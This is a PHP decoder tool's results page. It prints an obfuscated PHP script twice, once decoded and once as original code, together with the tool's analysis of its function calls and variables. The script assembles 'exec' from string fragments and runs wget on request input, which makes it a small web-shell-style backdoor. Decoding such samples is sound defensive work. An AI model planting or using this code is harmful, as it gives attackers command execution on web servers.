Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_ = "file_get_contents"; $__ = "s"; $___ = "h"; $____ = "ee"; $_____ = "ll";..

Decoded Output download

 
<?php 
$_ = "file_get_contents"; 
$__ = "s"; 
$___ = "h"; 
$____ = "ee"; 
$_____ = "ll"; 
$______ = "_"; 
$_______ = "exe"; 
$________ = "c"; 
 
function all($_,$__,$___,$____,$_____,$______,$_______,$________){ 
 
    $somethingood = array($_.$__.$___.$____.$____.$_____.$______.$_______.$________); 
    $ex = explode("_",$somethingood[0]); 
    print_r($ex[3]("w".$ex[1]." ".$_REQUEST['action'])); 
     
} 
 
all($_,$__,$___,$____,$_____,$______,$_______,$________); 
echo "<br/>"; 
show_source(__FILE__); 
?>

Did this file decode correctly?

Original Code


<?php
$_ = "file_get_contents";
$__ = "s";
$___ = "h";
$____ = "ee";
$_____ = "ll";
$______ = "_";
$_______ = "exe";
$________ = "c";

function all($_,$__,$___,$____,$_____,$______,$_______,$________){

    $somethingood = array($_.$__.$___.$____.$____.$_____.$______.$_______.$________);
    $ex = explode("_",$somethingood[0]);
    print_r($ex[3]("w".$ex[1]." ".$_REQUEST['action']));
    
}

all($_,$__,$___,$____,$_____,$______,$_______,$________);
echo "<br/>";
show_source(__FILE__);
?>

Function Calls

all 1
exec 1
explode 1

Variables

$_ file_get_contents
$__ s
$ex [{'key': None, 'value': 'file'}, {'key': None, 'value': 'get'}, {'key': None, 'value': 'contentssheeeell'}, {'key': None, 'value': 'exec'}]
$___ h
$____ ee
$_____ ll
$______ _
$_______ exe
$________ c
$somethingood [{'key': 0, 'value': 'file_get_contentssheeeell_exec'}]

Stats

MD5 18c856161917322447ff4aefee88d1c2
Eval Count 0
Decode Time 73 ms